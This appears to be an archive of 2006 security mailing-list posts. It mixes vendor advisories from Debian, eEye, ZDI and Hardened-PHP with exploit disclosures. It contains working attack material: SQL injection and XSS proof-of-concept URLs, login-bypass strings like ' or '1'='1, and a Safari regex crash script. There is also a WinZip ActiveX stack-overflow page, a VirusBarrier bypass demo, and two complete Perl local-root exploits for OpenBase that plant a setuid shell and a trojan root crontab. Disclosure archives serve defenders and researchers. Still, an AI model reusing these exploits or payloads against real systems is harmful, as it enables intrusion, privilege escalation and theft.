Real Estate Listing System SQL Injection
#Aria-Security Team Advisory #www.Aria-security.Com For English #www.Aria-Security.net For Persian #Original Advisory : http://aria-security.net/advisory/Real Estate Listing System.txt #--- #Software: Real Estate Listing System #Method : Sql Injection # #PoC: #http://target/[path]/listings.asp?itemID=[SQL] # #Contact: [EMAIL PROTECTED]
[SECURITY] [DSA 1210-1] New Mozilla Firefox packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1210-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 14th, 2006 http://www.debian.org/security/faq - -- Package: mozilla-firefox Vulnerability : several Problem type : remote Debian-specific: no CVE IDs: CVE-2006-2788 CVE-2006-4340 CVE-2006-4565 CVE-2006-4566 CVE-2006-4568 CVE-2006-4571 BugTraq ID : 20042 Several security related problems have been discovered in Mozilla and derived products such as Mozilla Firefox. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-2788 Fernando Ribeiro discovered that a vulnerability in the getRawDER functionallows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code. CVE-2006-4340 Daniel Bleichenbacher recently described an implementation error in RSA signature verification that cause the application to incorrectly trust SSL certificates. CVE-2006-4565, CVE-2006-4566 Priit Laes reported that that a JavaScript regular expression can trigger a heap-based buffer overflow which allows remote attackers to cause a denial of service and possibly execute arbitrary code. CVE-2006-4568 A vulnerability has been discovered that allows remote attackers to bypass the security model and inject content into the sub-frame of another site. CVE-2006-4571 Multiple unspecified vulnerabilities in Firefox, Thunderbird and SeaMonkey allow remote attackers to cause a denial of service, corrupt memory, and possibly execute arbitrary code. For the stable distribution (sarge) these problems have been fixed in version 1.0.4-2sarge12. For the unstable distribution (sid) these problems have been fixed in version 1.5.dfsg+1.5.0.7-1 of firefox. We recommend that you upgrade your Mozilla Firefox package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge12.dsc Size/MD5 checksum: 1003 751f0df80be8491ac3b24e902da6e3cb http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge12.diff.gz Size/MD5 checksum: 441420 8b1078ef98ff79137869c932999d3957 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d Alpha architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge12_alpha.deb Size/MD5 checksum: 11181154 771ba85fbf21e6419d87820fc6f19a9a http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge12_alpha.deb Size/MD5 checksum: 170352 f2c75d2fb5ab8684a20ba6fc08585cdb http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge12_alpha.deb Size/MD5 checksum:62166 79fd193ea817fc1f466a57e4a37d74fa AMD64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge12_amd64.deb Size/MD5 checksum: 9411492 3c3704ef1014e0d9dc38ece9d16a36d4 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge12_amd64.deb Size/MD5 checksum: 165132 54e7468747e04dc1449faa8ff9c123b4 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge12_amd64.deb Size/MD5 checksum:60700 a8ac42c24a29be9b260a0ec426b83f1c ARM architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge12_arm.deb Size/MD5 checksum: 8232340 0d9f98d7a3bc7bcef0d759b98061c79b http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge12_arm.deb Size/MD5 checksum: 156586 7b74819b6afa58f7c485fb581ace3501 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge12_arm.deb Size/MD5 checksum:55998 08e378fe351fc437422ea242ff83a60c HP Precision
ASPintranet SQL Injection
#Aria-Security Team Advisory #www.Aria-security.Com For English #www.Aria-Security.net For Persian #Original Advisory : http://aria-security.net/advisory/ASPintranet.txt #--- #Software: ASPintranet #Method : Sql Injection # #PoC: #http://target/[path]/default.asp?a=[SQL] # #Contact: [EMAIL PROTECTED]
SiteXpress SQL Injection
#Aria-Security Team Advisory #www.Aria-security.Com For English #www.Aria-Security.net For Persian #Original Advisory : http://aria-security.net/advisory/SiteXpress.txt #--- #Software: SiteXpress E-Commerce System #Method : SQL Injection # #PoC: #http://target/[path]/ #http://target/[path]/dept.asp?id=[SQL] # #Contact: [EMAIL PROTECTED]
WWWeb Cocepts SQL Injection
#Aria-Security Team Advisory #www.Aria-security.Com For English #www.Aria-Security.net For Persian #Original Advisory : http://aria-security.net/advisory/WWWeb Cocepts.txt #--- #Software: WWWeb Cocepts #Method : Sql Injection # #PoC: #http://target/[path]/prodtype.asp?prodtype=[SQL] #http://target/[path]/product.asp?product=[SQL] #Contact: [EMAIL PROTECTED]
Ustore SQL Injection
#Aria-Security Team Advisory #www.Aria-security.Com For English #www.Aria-Security.net For Persian #Original Advisory : http://aria-security.net/advisory/UStore.txt #--- #Software: UStore | E-Commerce in 15-Minutes #Method : Sql Injection # #PoC: #http://target/[path]/detail.asp?ID='=[SQL] # #Contact: [EMAIL PROTECTED]
eShopping SQL Injection
#Aria-Security Team Advisory #www.Aria-security.Com For English #www.Aria-Security.net For Persian #Original Advisory : http://aria-security.net/advisory/ecommercestore.txt #--- #Software: E Commerce Store Shop Builder #Method : SQL Injection # #PoC: #http://target/path/fulldetails.asp?brand=idcategory=scata=idProduct=[SQL INJECTION] #http://target/path/categories.asp?id=[SQL INJECTION] # #Contact: [EMAIL PROTECTED]
ECommerce Store Shop Builder
#Aria-Security Team Advisory #www.Aria-security.Com For English #www.Aria-Security.net For Persian #Original Advisory : http://aria-security.net/advisory/eShopping.txt #--- #Software: eShopping Cart #Method : SQL Injection # #PoC: #http://target/productdetail.asp?ProductID=[SQL CODE] #http://target/products.asp?categoryid=[SQL CODE] # #Contact: [EMAIL PROTECTED]
Engine Manager SQL Injection
#Aria-Security Team Advisory #www.Aria-security.Com For English #www.Aria-Security.net For Persian #Original Advisory : http://aria-security.net/advisory/Engine Manager.txt #--- #Software: Engine Manager #Method: SQL Injection #PoC: #http://target/[path]index.asp?mid=[SQL Injection] # #Contact: [EMAIL PROTECTED]
BPG Content Management System SQL Injection
#Aria-Security Team Advisory #www.Aria-security.Com For English #www.Aria-Security.net For Persian #Original Advisory : http://aria-security.net/advisory/bpg.txt #--- #Software: BPG Content Management System #Method: SQL Injection #PoC: #http://target/[path]/publication_view.asp?InfoID=[SQL CODE] #http://target/[path]/publications_list.asp?vjob=[SQL Injection] # #Contact: [EMAIL PROTECTED]
Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: Dotdeb PHP Email Header Injection Vulnerability Release Date: 2006/11/14 Last Modified: 2006/11/14 Author: Stefan Esser [EMAIL PROTECTED] Application: Dotdeb PHP 5.2.0 Rev 3 Severity: Calling PHP scripts with special crafted URLs can result in arbitrary email header injection Risk: Critical Vendor Status: Vendor has fixed this with Dotdeb PHP 5.2.0 rev 3 References: http://www.hardened-php.net/advisory_142006.139.html Overview: Quote from http://www.dotdeb.org Dotdeb is an unofficial repository containing many packages for the Debian stable (aka .Sarge.) distribution : * PHP, versions 4 5, * MySQL,versions 4.1 5.0, * Qmail, * Vpopmail... Its goal is to turn easily your Debian GNU/Linux boxes into powerful, stable and up-to-date LAMP servers. It was discovered that the Dotdeb PHP packages are patched with a mail() protection patch that was originally created by Steve Bennett and is nowadays developed at choon.net. This patch adds an X-PHP-Script header to outgoing mails that contains the name of the server, the script and the calling IP. Unfortunately the script name is directly copied from PHP's PHP_SELF variable without further processing. Because PHP_SELF does not only contain the script name but also the urldecoded content of PATH_INFO this allows injection of arbitrary content into the email headers. Because of this vulnerability on every PHP server that uses this patch every PHP script that uses the mail() function can be used to send either spam mail or tricked into disclosing sensitive content by injecting Bcc: headers. A possible attack could be injecting Bcc: headers into password reminder/password reset mails sent out by forums to break into the administrator account. Proof of Concept: The Hardened-PHP Project is not going to release a proof of concept exploit for this vulnerability. Disclosure Timeline: 10. November 2006 - Notified dotdeb vendor and choon.net 12. November 2006 - choon.net released updated patch 13. November 2006 - dotdeb released updated PHP packages 14. November 2006 - Public Disclosure Recommendation: We strongly recommend upgrading your dotdeb installation as soon as possible, because it not only fixes this vulnerability but also bundles our Suhosin Patch for extra protection of your PHP server. You can get the packages from: http://packages.dotdeb.org If you want more information about the Suhosin Patch then go to: http://www.hardened-php.net/suhosin/index.html GPG-Key: http://www.hardened-php.net/hardened-php-signature-key.asc pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1 Copyright 2006 Stefan Esser. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFFWfxoRDkUzAqGSqERAoX6AKCY+qlKNJkLIYvMYdhyTEXi1/WtfACg4szt zeDfTedyMjrarD7lYVLvvB0= =BcU5 -END PGP SIGNATURE-
Apple Safari match Buffer Overflow Vulnerability
The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4. A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution. script var reg = /(.)*/; var z = 'Z'; while (z.length = 8192) z+=z; var boum = reg.exec(z); /script
Re: [ GLSA 200611-03 ] NVIDIA binary graphics driver: Privilege escalation vulnerability
Raphael Marichez to Nick Boyce (??): um ... doesn't that make it a *remote* privilege escalation ? in a certain way... you're right... although that requires the user complicity, strictly speaking, you're right. Makes it no less remote. Not _automatic_ remote, but still very, very much remote. The guy who would manage to remotely root a box with that vulnerability would be really good. The real serious risk is local only. (think about all that unpatched linux boxes in the universities...) You have a really odd view of the security exposure... Even _Microsoft_ (now) self-rates this type of vulnerability as critical and remotely exploitable for execution of arbitrary code (e.g. the WMF vuln from late last year). OK -- so we can quibble over whether it released patches quickly enough in that case (no), but at least even the traditionally considered slackest of security slackers gets the rating of the severity and scope of this kind of vuln right. Any hope of Linux distro folk getting that clued? Regards, Nick FitzGerald
Re: [ GLSA 200611-03 ] NVIDIA binary graphics driver: Privilege escalation vulnerability
Nick Boyce wrote: On 11/7/06, Raphael Marichez [EMAIL PROTECTED] wrote: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: NVIDIA binary graphics driver: Privilege escalation vulnerability Date: November 07, 2006 Bugs: #151635 ID: 200611-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis The NVIDIA binary graphics driver is vulnerable to a local privilege escalation [snip] An X client could trigger the buffer overflow with a maliciously crafted series of glyphs. A remote attacker could also entice a user to open a specially crafted web page, document or X client that will trigger the buffer overflow. um ... doesn't that make it a *remote* privilege escalation ? Well, any file parsing bug could be considered a remote vulnerability if you consider the prospect of downloading a malicious file from the internet. I don't think that remote X clients are an issue; the last time I checked, the driver in question was only used for direct rendering, which requires a local X client, while indirect rendering uses the built-in software renderer. -- Glynn Clements [EMAIL PROTECTED]
Inventory Manager [injection sql xss (get)]
vendor site:http://www.websitedesignsforless.com/ product:Inventory Manager bug:injection sql xss (get) risk:medium injection sql : http://site.com/inventory/inventory/display/imager.asp?pictable='[sql] http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]picfield=[sql] http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]picfield=photowhere='[sql] xss get : http://site.com/inventory/inventory/display/display_results.asp?category=/textarea'scriptalert(document.cookie)/script laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]
Evolve Merchant[ injection sql ]
vendor site:http://www.lynxinternet.com/ product:Evolve Merchant bug:injection sql risk:medium injection sql (get) : http://site.com/viewcart.asp?zoneid='[sql] laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]
Car Site Manager [injection sql xss (get)]
Car Site Manager [injection sql xss (get)] vendor site:http://www.mginternet.com/ product:Car Site Manager bug:injection sql risk:medium injection sql : http://site.com/csm/asp/detail.asp?l=p='[sql] http://site.com/csm/asp/listings.asp?l='[sql] http://site.com/csm/asp/listings.asp?s=searchtyp='[sql] http://site.com/csm/asp/listings.asp?s=searchtyp=4loc='[sql] xss (get): http://site.com/csm/asp/listings.asp?s=/textarea'scriptalert(document.cookie)/script laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]
Re: New Bug MiniBB Forum = 2 Remote File Include (index.php)
This is bogus, about 5-10 lines above it includes a file which declares $pathToFiles. include ('./setup_options.php'); if(!isset($startIndex)) $startIndex=$indexphp; if(!isset($manualIndex)) $manualIndex=$indexphp.'action=manual'; $langOrig=$lang; $indexphp=(!isset($GLOBALS['indexphp'])?'index.php':$GLOBALS['indexphp']); if(!isset($manualIndex)) $manualIndex=$indexphp.'action=manual'; if(isset($mod_rewrite) and $mod_rewrite) $queryStr=str_replace(array('%3D0%26mdrw%3Don', 'amp;mdrw=on'), '', $queryStr); if($useSessions) { $sessname=ini_get('session.name'); if($sessname=='') $sessname='PHPSESSID'; session_start(); if(!isset($$sessname)) { $indexphp.=SID.''; $bb_admin.=SID.''; } else { $indexphp.={$sessname}=.$$sessname.''; $bb_admin.={$sessname}=.$$sessname.''; } } include ($pathToFiles.'setup_'.$DB.'.php'); include ($pathToFiles.'bb_cookie.php'); include ($pathToFiles.'bb_functions.php'); include ($pathToFiles.'bb_specials.php');
FunkyASP Glossary v1.0 [injection sql]
vendor site:http://www.funkyasp.co.uk/ product:FunkyASP Glossary v1.0 bug:injection sql risk:medium injection sql : http://www.demo.funkyasp.co.uk/demo/glossary/glossary.asp?alpha='[sql] laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]
Blogme v3 [admin login bypass xss (post)]
vendor site:http://www.drumster.net/ product:Blogme v3 bug:login bypass xss (post) risk:high admin login bypass : user : ' or '1' = '1 passwd: 1'='1' ro ' xss post : in: /comments.asp?blog=85 vulnerables fields: - Name - URL - Comments laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]
Property Site Manager [login bypass ,multiples injection sql xss (get)]
vendor site:http://www.mginternet.com/ product:Property Site Manager bug:injection sql ,login bypass , xss risk:medium login bypass : just login with : user: 'or''=' passwd: 'or''=' injection sql : http://site.com/asp/detail.asp?l=p='[sql] http://site.com/asp/listings.asp?l='[sql] http://site.com/asp/listings.asp?s=searchtyp='[sql] http://site.com/asp/listings.asp?s=searchtyp=4loc='[sql] xss (get): http://site.com/asp/listings.asp?s=/textarea'scriptalert(document.cookie)/script laurent gaffié benjamin mossé http://s-a-p.ca/ contact: [EMAIL PROTECTED]
[Fwd: DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit']
I think the list spam trap ate this message a few weeks ago. ---BeginMessage--- This was supposed to go out on Halloween but it didn't... but either way all you Mac users can get scared or something. OOGA BOOGA! pwntego.tar.gz Description: GNU Zip compressed data DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit' Author: Kevin Finisterre Vendor(s): http://www.intego.com Product: 'Intego VirusBarrier X4 = VirusBarrierX47070.dmg' References: http://www.digitalmunition.com/DMA[2006-1031a].txt Description: Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus security solution for Macintosh computers, by Intego, the leading publisher of personal security software for Macintosh. It offers thorough protection against viruses of all types, coming from infected files or applications, whether on CD-ROMs, DVDs or other removable media, or on files downloaded over the Internet or other types of networks. Intego VirusBarrier X4 protects your computer from viruses by constantly examining all the files that your computer opens and writes, as well as watching for suspicious activity that may be the sign of viruses acting on applications or other files. With Intego VirusBarrier X4 on your computer, you can rest assured that your Macintosh has the best protection available against viruses of all kinds. Although VirusBarrier does a pretty good job of halting malicous activity the product currently suffers from a flaw related to the amount of alerts that it can process simultaneously. If an attacker is able to trigger multiple alerts in succession within a very short amount of time he or she may be able cause VirusBarrier to completely ignore positive matches against virus definitions. The consequences of ignored matches may include full system compromise or further spreading of malware. As an example we will show how VirusBarrier normally stops a local root exploit with behavior similar to 'OSX.ExploitMachex.A', then we will demonstrate how the VirusBarrier protection can be bypassed by using a simple flood of Eicar Test files. Any typical attempt to access or execute a file or program that is a match for a VirusBarrier definition results in an alert on the user interface. There is a sweet lookin insulin bottle on the screen that slowly empties as the virus nears eradication. 'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do ('Ignore' || 'Repair')? Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus program existed at all. virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin) On the other hand if you chose 'Repair' the process is terminated dead in its tracks and the file is nulled out: virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit -bash: ./excploit: Operation not permitted virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit -rwxr-xr-x 1 virusbar wheel 0 Oct 31 02:02 excploit The above output demonstrates how Virusbarrier is supposed to work. Under normal circumstances this would be adequate to stop a malicious attack. If however an attacker floods the file system with dummy virus files at a quick rate the VirusBarrier software will promptly stop responding after presenting the user with a few audible and visual alerts. After about 40 some odd infected files in a row the system will become confused and in some cases VirusBarrier may stop responding completely. (Intego confirmed a limit of 20 files) When under attack the user may see dozens of messages on the screen. With our example code the messages are similar to the following: '0.92815455662033' is infected by 'EICAR Test' What would you like to do ? From the attackers standpoint the exploitation is fairly quick and simple. Our example uses a local root exploit however this tactic could easily be applied to any existing malware technique that Intego VirusBarrier protects against. Code could in theory be run as a precurser to an InqTana attack as a means to bypass the Intego protection. The existing signatures for InqTana A B C and D would then be completely useless and an E variant would be born. virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls Pwntego.pl Pwntego.sh README.txt pwntego.uu rand-eicar.pl virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl rm: /tmp/objc_sharing_ppc_92: Permission denied ;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P ;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p ;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p Injecting pwnacillin shot ;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel)
Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
7245 correctly resolves this issue; standard stack overflow in WZFILEVIEW.FilePattern snatching EIP; PoC below; HTML HEAD TITLE/TITLE /HEAD BODY SCRIPT LANGUAGE=VBScript !-- Sub WZFILEVIEW_OnAfterItemAdd(Item) WZFILEVIEW.FilePattern = SMASHTHESTACKHERE end sub -- /SCRIPT OBJECT ID=WZFILEVIEW WIDTH=200 HEIGHT=200 CLASSID=CLSID:A09AE68F-B14D-43ED-B713-BA413F034904 /OBJECT /BODY /HTML -- prdelka ___ All new Yahoo! Mail The new Interface is stunning in its simplicity and ease of use. - PC Magazine http://uk.docs.yahoo.com/nowyoucan.html
[Fwd: OpenBase SQL multiple vulnerabilities Part Deux]
I think the list spam trap ate this message a few weeks ago. ---BeginMessage--- #!/usr/bin/perl # # http://www.digitalmunition.com # written by kf (kf_lists[at]digitalmunition[dot]com) # # = ftp://www.openbase.com/pub/OpenBase_10.0 (vulnerable) ? # # This is some fairly blatant and retarded use of system() # # cd cp chmod chown rm mkdir and killall appear as strings in the binary hrmm can you cay system() ! # -restart -MachLaunch -launch -noexit -install_plugins -kill -install -uninstall and -deactivate all # *may* be used to trigger these issues. # # I don't feel like seeing which flags call which binaries... just 3 is plenty to prove the point. # # Tested against OpenBase10.0.0_MacOSX.dmg $binpath = /Library/OpenBase/bin/openexec; # Typical location. $tgts{0} = cp:$binpath -install; $tgts{1} = killall:$binpath -kill; $tgts{2} = rm:$binpath -uninstall; unless (($target) = @ARGV) { print \n\nUsage: $0 target \n\nTargets:\n\n; foreach $key (sort(keys %tgts)) { ($a,$b) = split(/\:/,$tgts{$key}); print \t$key . $a - $b\n; } print \n; exit 1; } $ret = pack(l, ($retval)); ($a,$b) = split(/\:/,$tgts{$target}); print *** Target: $a - $b\n; open(OP,/tmp/finisterre.c); printf OP main()\n; printf OP { seteuid(0); setegid(0); setuid(0); setgid(0); system(\chown root: /tmp/pwns ; chmod 4775 /tmp/pwns\); }\n; open(OP,/tmp/pwns.c); printf OP main()\n; printf OP { seteuid(0); setegid(0); setuid(0); setgid(0); system(\/bin/sh -i\); }\n; system(gcc -o /tmp/finisterre /tmp/finisterre.c); system(gcc -o /tmp/pwns /tmp/pwns.c); system(echo /bin/cp /tmp/finisterre /tmp/$a); system(/bin/cp /tmp/finisterre /tmp/$a); system(export PATH=/tmp:\$PATH; $b); system(/tmp/pwns); #!/usr/bin/perl # # http://www.digitalmunition.com # written by kf (kf_lists[at]digitalmunition[dot]com) # # = ftp://www.openbase.com/pub/OpenBase_10.0 (vulnerable) ? # # Create a new file anywhere on the filesystem with rw-rw-rw privs. # Sorry you can NOT overwrite existing files. # # Writing to roots crontab seems to be fairly prompt at handing out root shells # Make sure that you get cron running by first creating a user crontab! # # The openexec binary creates a root owned log file in /tmp/ # Following symlinks is bad mmkay! # # Tested against OpenBase10.0.0_MacOSX.dmg $dest = /var/cron/tabs/root; $binpath = /Library/OpenBase/bin/openexec; # Typical location. # In this instance targets are really pointless but I wanted to archive known vulnerable versions while testing. $tgts{0} = OpenBase10.0.0_MacOSX.dmg:$binpath; unless (($target) = @ARGV) { print \n\nUsage: $0 target \n\nTargets:\n\n; foreach $key (sort(keys %tgts)) { ($a,$b) = split(/\:/,$tgts{$key}); print \t$key . $a\n; } print \n; exit 1; } $ret = pack(l, ($retval)); ($a,$b) = split(/\:/,$tgts{$target}); print *** Target: $a $b\n; open(OP,/tmp/finisterre.c); printf OP main()\n; printf OP { seteuid(0); setegid(0); setuid(0); setgid(0); system(\/bin/sh -i\); }\n; system(gcc -o /Users/Shared/shX /tmp/finisterre.c); # Create a user crontab FIRST! This ensures that cron is running when the fake root crontab is created. Aka semi-insta-root (in a minute) system(echo '* * * * * /usr/bin/id /tmp/aa' /tmp/user_cron); system(crontab /tmp/user_cron); # The umask is where the lovin occurs. I'm rw-rw-rw James bitch!! system(ln -s $dest /tmp/output); sleep 60; # Probably don't need to wait this long but whatever... system(umask 111; $b -deactivate); print $dest should be rw-rw-rw ... enjoy!\n; print installing trojan crontab for root\n; system(echo '* * * * * /usr/sbin/chown root: /Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX' /var/cron/tabs/root); print sit around and chill for a minute then check /Users/Shared/shX !\n; sleep 60 ; system(/Users/Shared/shX); DMA[2006-1107a] - 'OpenBase SQL multiple vulnerabilities Part Deux' Author: Kevin Finisterre Vendor(s): http://www.openbase.com Product: 'OpenBase SQL =10.0 (?)' References: http://www.digitalmunition.com/DMA[2006-1107a].txt Description: (regurgitation warning - this may taste VERY familiar) For over a decade, the OpenBase family of products have been enabling some of the most innovative business applications at work today. With thousands of customers worldwide, OpenBase has become a brand that companies can rely on. OpenBase customers include ATT, Adobe Systems, Canon, Walt Disney, First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image and many other innovators worldwide. As mentioned previously several setuid root binaries from OpenBase SQL are placed in /Library/OpenBase/bin during the installation of WebObjects support for Xcode or during a standard OpenBase install. In this particular instance we will be dealing only with the openexec binary. pwnercycles-ibook:/tmp pwnercycle$ ls -al
EEYE: Workstation Service NetpManageIPCConnect Buffer Overflow
eEye Research - http://research.eeye.com Workstation Service NetpManageIPCConnect Buffer Overflow Release Date: November 14, 2006 Date Reported: July 25, 2006 Severity: High (Remote Code Execution) Vendor: Microsoft Systems Affected: Windows 2000 (Remote Code Execution) Windows XP SP1 (Local Privilege Escalation) Overview: A flaw exists in a default Windows component called the Workstation Service that when exploited allows for remote code execution in SYSTEM context, allowing an attacker to take complete control of affected systems. Technical Details: In the Workstation Service module called wkssvc.dll, the NetpManageIPCConnect function has a call to swprintf with an unchecked buffer. The input buffer is controllable by the remote attacker. .text:76781D67 mov edi, [ebp+arg_0] ... .text:76781D90 lea eax, [ebp+var_2CC] ... .text:76781DA0 pushedi .text:76781DA1 pushoffset %ws\\IPC$ .text:76781DA6 pusheax .text:76781DA7 callds:swprintf This function is called by NetpJoinDomain, which is eventually called by the NetrJoinDomain2 function, which is exposed through RPC. The IDL for NetrJoinDomain2 looks like this: long [EMAIL PROTECTED] ( [in][unique][string] wchar_t * arg_1, [in][string] wchar_t * arg_2, [in][unique][string] wchar_t * arg_3, [in][unique][string] wchar_t * arg_4, [in][unique] struct_C * arg_5, [in] long arg_6 ); arg_2 will contain string with format like Domain name+\+Hostname. Hostname will be passed as NetpManageIPCConnect's first argument. The variable is under the attacker's control and is passed to swprintf, which causes a stack-based buffer overflow. For this vulnerable code to be reached, we must provide a valid and live Domain name as a part of the string. We can set up a fake domain server anywhere reachable from the vulnerable machine on the Internet. P.S. If you despise Birkenstocks, are not afraid of your Tequila, and are well versed in reverse engineering, bug finding, or are looking to learn, we are hiring both junior and senior security researchers. Send your resume (blathering of college course work, degrees, and past experience we don't care about) or more importantly a description of why you would be a good researcher to [EMAIL PROTECTED] Credit: Discovery: JeongWook Matt Oh Additional Research: Derek Soeder Related Links: Retina Network Security Scanner - Free Trial Blink Endpoint Vulnerability Prevention - Free Trial Greetings: Dugsong, Ohhara, Ryan Lee, Pilot, Sakai, Gonan and all the Korean Bugtruck Mailing List Subscribers Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-040.html November 14, 2006 -- CVE ID: CVE-2006-5198 -- Affected Vendor: WinZip -- Affected Products: WinZip 10.0 (pre build 7245) -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since September 5, 2006 by Digital Vaccine protection filter ID 4671. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of WinZip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists within the ActiveX control WZFILEVIEW.FileViewCtrl.61, CLSID: A09AE68F-B14D-43ED-B713-BA413F034904 A re-branded version of the FileView ActiveX control developed by Sky Software. The object is marked Safe for Scripting and exposes several unsafe methods which can be leveraged to result in arbitrary code execution with no further interaction. -- Vendor Response: WinZip has issued build 7245 to correct this vulnerability. More details can be found at: http://www.winzip.com/wz7245.htm -- Disclosure Timeline: 2006.08.28 - Vulnerability reported to vendor 2006.09.05 - Digital Vaccine released to TippingPoint customers 2006.11.14 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
ZDI-06-041: Microsoft Internet Explorer CSS Float Property Memory Corruption Vulnerability
